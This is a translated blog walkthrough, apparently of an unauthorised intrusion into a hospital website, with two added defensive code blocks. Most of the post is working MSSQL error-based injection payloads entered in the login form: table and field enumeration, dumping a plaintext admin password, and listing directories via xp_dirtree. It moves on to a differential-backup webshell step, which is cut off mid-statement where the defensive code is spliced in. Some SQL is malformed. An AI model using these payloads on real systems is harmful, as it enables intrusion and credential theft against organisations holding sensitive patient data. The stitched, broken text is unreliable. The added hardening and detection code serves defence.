By Ay shadow
I was studying Java and getting nowhere when a friend sent me a website. He said the front end had no injection points and no upload points, and that the back-end login had an injection point, but he didn't have the skill to make use of it. So I put my work down and opened the site.
I opened the website (I won't publish the address, I'll only describe the process). It's a hospital site, and the program is ASP; I'm familiar with ASP sites, so that was a bit of a relief. I clicked a news link and appended a single quotation mark. A dialog box popped up.
It looked a bit defended. I needed to find out whether that was an anti-injection system; if so, we could try cookie injection. So I changed the detection method, that is
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65&MainBcgID=102-0
Appending -0 after the number and pressing Enter brought up the same prompt dialog, so I submitted each parameter separately:
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65-0&MainBcgID=102
http://www.xxx.com/kssz.asp?BcgID=104-0&ThatBcgID=65&MainBcgID=102
All of them gave the same prompt. It seems the program filters the parameters itself rather than relying on an anti-injection system.
Then I opened Google and searched for the site's links of the form asp?id=; the result was the same, so injection on the front end was useless.
Next I used my own scanning tool to scan for common upload points and found none. It seemed the only way in was the back-end login form.
In the back-end login form I entered a single quotation mark as the username, typed any password, and pressed Enter. An error was returned.
It seemed my friend was right. And it's MSSQL; fortunately so, because otherwise it wouldn't have been enough (the reason comes later).
Then, following the usual steps, I started injecting. But I'm a lazy person and wanted to save myself effort, so I captured the packet, hoping to inject through GET and let a tool replace the manual work, haha.
So I assembled the request:
www.xxx.com/login/default.asp?Submit=%B5%C7+%C2%BC&Userpwd=1&Username=1
But luck wasn't with me; that method didn't work here. Ah, it looked like it had to be done manually, which is quite painful for me.
Fine, honestly step by step. I entered ' having 1=1 and ''=' in the input box and pressed Enter. An error was returned.
Hey, I laughed proudly: from this error we get the table name and a field name. Continue the enumeration and enter ' group by user_info.user_id having 1=1 and ''='
The field user_name came out. Continue: ' group by user_info.user_id,user_info.user_name having 1=1 and ''='
That's about it. We have all the key fields and the table name, so now we dump the contents. Enter
' and 1=(select user_name from user_info) and ''=' and the user name is displayed in the error.
Then, in the same way, enter ' and 1=(select user_pwd from user_info) and ''=' to get the password. Haha, I found the password wasn't even encrypted; all the better.
I took the password and logged into the back end directly.
I thought getting a shell would be easy next. I found an upload point at random and tried uploading a file directly; it told me the upload succeeded. Haha, I was happy: my luck was good today, and after a bit of manual work I'd got a shell straight away. So I opened the address. And I coughed up blood on the spot. Why? Because the folder in the upload path doesn't allow script execution.
I was so angry at this administrator, shit. He got my hopes up for nothing. The folders for the other images were the same: none of them allowed script execution. Heaven and earth, how can you treat me like this? I thought there was no way to get a shell and was ready to give up, but when I told my friend, he said I could use a differential backup from the back end to get a shell. I slapped my thigh: right, why didn't I think of that? I'd forgotten about the MSSQL injection in the back end, and despised myself for it.
To perform a differential backup you must first know the site's path. Well, the most troublesome manual work starts again. Let me put a sentence here: I hope you study SQL well. Tools are dead, people are alive, even though it's a lot of manual trouble. (Audience: he's showing off again; be careful when you go out, you'll get struck by lightning..... Me: Haha, I'm not afraid, I'm an insulator, it's fine..... Suddenly the sky splits and the shadow is struck by lightning... 55555555. I didn't check the almanac today.)
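The login form above fails in two ways the walkthrough relies on: the username is concatenated into the SQL text, so a quote changes the statement and the engine's error reaches the browser, and the stored password is plaintext. The following is an added example by the editor, not code from the post or the site: a Python/sqlite3 stand-in showing the concatenated login next to a parameterised one that also stores a salted PBKDF2 hash. The table and column names (user_info, user_name, user_pwd) are the ones the post enumerates; the database, the `admin`/`hunter2` row and the function names are constructed for the demonstration, and hashing goes a step beyond the post, which only notes that the password was unencrypted.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000  # assumption: a modest work factor for the demo


def make_legacy_db():
    # Constructed in-memory stand-in for the site's table: plaintext passwords,
    # as the post found. Not data from the real site.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_info (user_id INTEGER PRIMARY KEY, "
                 "user_name TEXT, user_pwd TEXT)")
    conn.execute("INSERT INTO user_info (user_name, user_pwd) "
                 "VALUES ('admin', 'hunter2')")
    return conn


def vulnerable_login(conn, username, password):
    # String concatenation: the input becomes part of the statement text, so a
    # quote ends the literal early and the engine's parse error propagates to
    # the caller (the error page the post keeps triggering).
    sql = ("SELECT user_id FROM user_info WHERE user_name = '" + username +
           "' AND user_pwd = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def hash_password(password, salt=None):
    # PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored as "salt_hex$hash_hex".
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    salt_hex, digest_hex = stored.split("$", 1)
    recomputed = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                     bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(recomputed.hex(), digest_hex)


def make_hardened_db():
    # Same table layout, but user_pwd holds a salted hash instead of plaintext.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_info (user_id INTEGER PRIMARY KEY, "
                 "user_name TEXT UNIQUE, user_pwd TEXT)")
    conn.execute("INSERT INTO user_info (user_name, user_pwd) VALUES (?, ?)",
                 ("admin", hash_password("hunter2")))
    return conn


def hardened_login(conn, username, password):
    # Parameterised query: values travel separately from the statement text,
    # so a quote is just data. Engine errors are logged server-side; the caller
    # only ever learns success or failure.
    try:
        row = conn.execute("SELECT user_pwd FROM user_info WHERE user_name = ?",
                           (username,)).fetchone()
    except sqlite3.Error as exc:
        print("login query failed:", exc)  # server log, never echoed to the client
        return False
    if row is None:
        # Hash anyway so response time does not reveal whether the user exists.
        verify_password(hash_password("placeholder"), password)
        return False
    return verify_password(row[0], password)


def error_reaches_user(login_fn, conn, username, password):
    # True when the login function lets a database error escape to the caller.
    try:
        login_fn(conn, username, password)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    legacy, hard = make_legacy_db(), make_hardened_db()
    print("legacy: quote probe leaks error:", error_reaches_user(vulnerable_login, legacy, "'", "x"))
    print("hardened: quote probe leaks error:", error_reaches_user(hardened_login, hard, "'", "x"))
    print("hardened: correct password:", hardened_login(hard, "admin", "hunter2"))
```

The quote probe from the post raises an error straight out of `vulnerable_login`, which is exactly the oracle the enumeration steps depend on; against `hardened_login` the same input is an ordinary failed login, and even a full table dump would yield only salted hashes.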
Start guessing the path. The process is: create a table, use the xp_dirtree extended stored procedure to insert the directory listing into that temporary table, then read the contents out of the temporary table one row at a time.
First, create the table: enter ' create table tmp (id int identity(255), path varchar(), depth int, isfile int) and ''='
Then we need to confirm that the table was created successfully; otherwise everything we do afterwards is wasted. Enter ' select * from tmp having 1=1 and ''='. An error is returned, which indicates the table was created.
Next, insert the content:
' insert into tmp exec master.dbo.xp_dirtree 'd:',1,1 and ''='
Then you can list the directory. Enter
' and 1=(select path from tmp where id=N) and ''=' (N = 1, 2, 4, 5, ......)
and the path is listed.
Change the value of N to list the rest. The process just repeats, so I won't write it out. The path is D:\website\xxx.com.
Next, perform the differential backup. In the input box, enter the differential backup statement:
Alter database hz3yy set recovery full --
Drop table [banlg]; create table [dbo
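Every step of this chain went through one login field on one host, so the request log is where it shows up: a quote in a username, then HAVING/GROUP BY error probes, then a subquery in a comparison, then xp_dirtree, then a recovery-model change before a backup. The following is an added example by the editor, not code from the post: a detector that decodes the parameters of W3C-style IIS log lines, tags each request with the stage of the walkthrough it matches, and reports sources that reach more than one stage. The log lines are constructed for the demonstration (they assume the login handler records submitted form fields in cs-uri-query, which stock IIS logging does not do for POST bodies), the IPs are documentation addresses, and the stage names and function names are the editor's.

```python
import re
from urllib.parse import parse_qsl

# Stages of the walkthrough, each with a regex over decoded parameter values.
# The patterns are the inputs the post shows; the stage names are assumptions.
STAGES = [
    ("probe", re.compile(r"'")),
    ("enumerate", re.compile(
        r"having\s+1\s*=\s*1|group\s+by\s+\w+\.\w+|1\s*=\s*\(\s*select\b", re.I)),
    ("dirtree", re.compile(r"xp_dirtree|create\s+table\s+tmp\b|from\s+tmp\b", re.I)),
    ("backup", re.compile(
        r"set\s+recovery\s+full|backup\s+database|drop\s+table", re.I)),
]
STAGE_NAMES = [name for name, _ in STAGES]

# Constructed sample log (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# 203.0.113.7 replays the post's inputs; 198.51.100.4 is a legitimate user whose
# name happens to contain an apostrophe. Not a log from the real site.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-05-01 10:00:01 203.0.113.7 GET /kssz.asp BcgID=104&ThatBcgID=65&MainBcgID=102 200
2010-05-01 10:00:09 203.0.113.7 GET /kssz.asp BcgID=104&ThatBcgID=65&MainBcgID=102-0 200
2010-05-01 10:02:13 203.0.113.7 POST /login/default.asp Username=%27&Userpwd=1 500
2010-05-01 10:03:40 203.0.113.7 POST /login/default.asp Username=%27+having+1%3D1+and+%27%27%3D%27&Userpwd=1 500
2010-05-01 10:04:02 203.0.113.7 POST /login/default.asp Username=%27+group+by+user_info.user_id+having+1%3D1+and+%27%27%3D%27&Userpwd=1 500
2010-05-01 10:09:55 203.0.113.7 POST /login/default.asp Username=%27+and+1%3D%28select+user_name+from+user_info%29+and+%27%27%3D%27&Userpwd=1 500
2010-05-01 10:31:10 203.0.113.7 POST /login/default.asp Username=%27+insert+into+tmp+exec+master.dbo.xp_dirtree+%27d%3A%27%2C1%2C1+and+%27%27%3D%27&Userpwd=1 500
2010-05-01 10:40:00 198.51.100.4 POST /login/default.asp Username=o%27brien&Userpwd=secret 302
"""


def parse_line(line):
    # Returns None for directives and malformed lines; otherwise the source IP,
    # the path and the decoded (name, value) parameter pairs.
    parts = line.split()
    if len(parts) < 7 or parts[0].startswith("#"):
        return None
    _date, _time, ip, _method, stem, query, status = parts[:7]
    fields = parse_qsl(query, keep_blank_values=True)
    return {"ip": ip, "stem": stem, "fields": fields, "status": status}


def stages_for_values(values):
    # Stage names whose pattern matches any decoded parameter value, in chain order.
    return [name for name, rx in STAGES if any(rx.search(v) for v in values)]


def scan_log(text):
    # Maps each source IP to the list of stage hits in the order they occurred.
    per_ip = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        values = [v for _, v in rec["fields"]]
        for stage in stages_for_values(values):
            per_ip.setdefault(rec["ip"], []).append(stage)
    return per_ip


def suspicious_sources(text, min_stages=2):
    # A lone quote is noisy (O'Brien logs in too); a source that reaches two or
    # more distinct stages is the signal worth an alert. Stages are reported in
    # chain order.
    result = {}
    for ip, hits in scan_log(text).items():
        distinct = sorted(set(hits), key=STAGE_NAMES.index)
        if len(distinct) >= min_stages:
            result[ip] = distinct
    return result


if __name__ == "__main__":
    for ip, stages in suspicious_sources(SAMPLE_LOG).items():
        print(ip, "->", " > ".join(stages))
```

The `backup` stage is not exercised by the sample log because the post's own recovery-model statement (`Alter database hz3yy set recovery full --`) is what it matches; feeding that string to `stages_for_values` tags it directly. On a real deployment the same rules fit a SQL Server audit or Extended Events stream of statement text, where xp_dirtree and ALTER DATABASE ... SET RECOVERY from the web application's login are never expected.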